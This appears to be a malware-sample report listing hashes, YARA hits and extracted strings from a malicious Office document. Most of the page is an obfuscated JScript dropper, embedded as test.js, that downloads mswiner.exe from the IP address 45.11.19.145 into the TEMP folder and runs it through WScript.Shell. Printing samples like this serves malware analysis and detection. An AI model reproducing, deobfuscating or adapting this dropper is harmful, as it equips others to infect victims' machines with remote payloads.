Sample details: 6ee77b3f5940a746aa284de15ec413b9 --

Hashes
MD5: 6ee77b3f5940a746aa284de15ec413b9
SHA1: 07fe19580bcfdf16eb7949fc0433fca7b97919a2
SHA256: e9eba6aa0a21b4b41d6c78bde89b977508091fae2e99206120eff0dbcded045b
SSDEEP: 48:rHMUCoKpXb9i+aRREu1n1RHNok+XJ1DXdHPjKiAvpm:YqyXbXyRP1n7o5lXdvjJc
Details
File Type: Composite
Added: 2019-09-10 14:59:32
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Dropper_Strings |
Parent Files
ae571e035b3480f328db6bf66b38ce69
Strings
		Package
Package
Package
test.js
C:\fakepath\test.js
C:\Users\MAILER\AppData\Local\Temp\test.js
var _0x2ac5 = [
    'Echo',
    'not\x20supported',
    'Quit',
    'MSXML2.XMLHTTP',
    'open',
    'send',
    'Status',
    'Open',
    'Type',
    'Write',
    'ResponseBody',
    'SaveToFile',
    'Close',
    'Run',
    'http://45.11.19.145/mswiner.exe',
    '\x5cmswiner.exe',
    'CreateObject',
    'WScript.Shell',
    'ExpandEnvironmentStrings',
    '%TEMP%',
    'ADODB.Stream'
(function (_0x55a8f1, _0x3fbcdd) {
    var _0x3b444a = function (_0x4dbf6e) {
        while (--_0x4dbf6e) {
            _0x55a8f1['push'](_0x55a8f1['shift']());
        }
    };
    _0x3b444a(++_0x3fbcdd);
}(_0x2ac5, 0x160));
var _0x1aca = function (_0x3dc786, _0x3a0921) {
    _0x3dc786 = _0x3dc786 - 0x0;
    var _0x5d4a74 = _0x2ac5[_0x3dc786];
    return _0x5d4a74;
var _0x4d3d11 = WScript[_0x1aca('0x0')](_0x1aca('0x1'));
var _0x37879b = _0x4d3d11[_0x1aca('0x2')](_0x1aca('0x3'));
function _0x3a570c(_0x126a56, _0x5defb9) {
    try {
        var _0x375a89 = new ActiveXObject(_0x1aca('0x4'));
    } catch (_0x46aa39) {
        WScript[_0x1aca('0x5')](_0x1aca('0x6'));
        WScript[_0x1aca('0x7')]();
    var _0x1cd91e = new ActiveXObject(_0x1aca('0x8'));
    _0x1cd91e[_0x1aca('0x9')]('GET', _0x126a56, ![]);
    _0x1cd91e[_0x1aca('0xa')]();
    if (_0x1cd91e[_0x1aca('0xb')] == 0xc8) {
        _0x375a89[_0x1aca('0xc')]();
        _0x375a89[_0x1aca('0xd')] = 0x1;
        _0x375a89[_0x1aca('0xe')](_0x1cd91e[_0x1aca('0xf')]);
        _0x375a89[_0x1aca('0x10')](_0x5defb9, 0x2);
        _0x375a89[_0x1aca('0x11')]();
        _0x375a89 = null;
    } else {
        WScript[_0x1aca('0x7')]();
    _0x1cd91e = null;
MyObject = new ActiveXObject(_0x1aca('0x1'));
function _0x79c93b() {
    MyObject[_0x1aca('0x12')](_0x37879b + '\x5cmswiner.exe');
_0x3a570c(_0x1aca('0x13'), _0x37879b + _0x1aca('0x14'));
_0x79c93b();*